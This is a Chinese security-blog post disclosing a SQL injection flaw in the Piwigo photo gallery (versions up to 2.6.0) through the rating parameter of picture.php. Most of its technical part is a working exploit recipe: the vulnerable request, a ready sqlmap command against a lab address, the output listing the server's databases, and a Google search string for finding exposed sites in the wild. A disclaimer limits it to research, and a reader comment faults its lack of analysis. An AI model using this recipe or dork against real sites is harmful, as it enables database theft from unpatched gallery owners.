免费开源相册Piwigo <= v2.6.0 SQL注入漏洞(0day)

2014-11-15 54010人围观 ,发现 5 个不明物体 漏洞

Piwigo是世界上最著名的免费开源相册系统之一,由PHP+MySQL架构。由于该框架搭建方便,受到国内外的开发者青睐,近日,Piwigo <= v2.6.0爆出重要0day漏洞。

漏洞成因,Piwigo相册系统的/piwigo/picture.php页面,没有完整的验证jQuery参数。攻击者成功利用该漏洞,可以获取数据库的全部信息,漏洞及其简单暴力。

漏洞影响范围,Piwigo <= v2.6.0。

漏洞POC 本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

/piwigo/picture.php?/1/category/1&action=rate (POST parameter: rate=1)

Exploiting with SQLMap:

python sqlmap.py -u "http://192.168.244.129/piwigo/picture.php?/1/category/1&action=rate"; --data
"rate=1" --dbs

[16:32:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[16:32:25] [INFO] fetching database names
[16:32:25] [INFO] fetching number of databases
[16:32:25] [INFO] resumed: 4
[16:32:25] [INFO] resumed: information_schema
[16:32:25] [INFO] resumed: mysql
[16:32:25] [INFO] resumed: phpmyadmin
[16:32:25] [INFO] resumed: piwigo
available databases [4]:
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] piwigo

国内部分网站受该漏洞影响,截图

Google关键字:inurl:piwigo/picture.php

午夜灰狼哥

6篇文章等级:4

这家伙太懒,还未填写个人描述!

这些评论亮了

  • C4D (2级) 回复
    能讲一讲是怎么挖的漏洞问题出在哪里么?天天不痛不痒的发这种低级程序的漏洞有什么意思?分析在哪儿?
    )22( 亮了
发表评论

已有 5 条评论

取消
Loading...
午夜灰狼哥

这家伙太懒,还未填写个人描述!

6篇文章21条评论

特别推荐

关注我们 分享每日精选文章

不容错过

css.php